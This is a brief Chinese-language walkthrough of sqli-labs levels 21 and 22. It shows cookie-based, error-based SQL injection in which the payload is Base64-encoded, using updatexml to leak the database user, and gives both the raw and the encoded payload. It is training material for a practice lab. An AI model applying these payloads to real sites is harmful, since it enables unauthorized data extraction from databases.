sqli-labs第二十一，二十二题

直入主题

这一题是在20题的基础上对cookie进行了Base64加密。

BP抓包

正常登录后刷新页面进行抓包

注入单引号

单引号加密后是 Jw==
成功触发错误

从错误信息可以直到还需要闭合一个括号

构造payload

payload：') and updatexml(1,concat(0x7c,user()),1)#
加密：JykgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdjLHVzZXIoKSksMSkj

成功获取用户名

二十二题

解法相同，不过是闭合双引号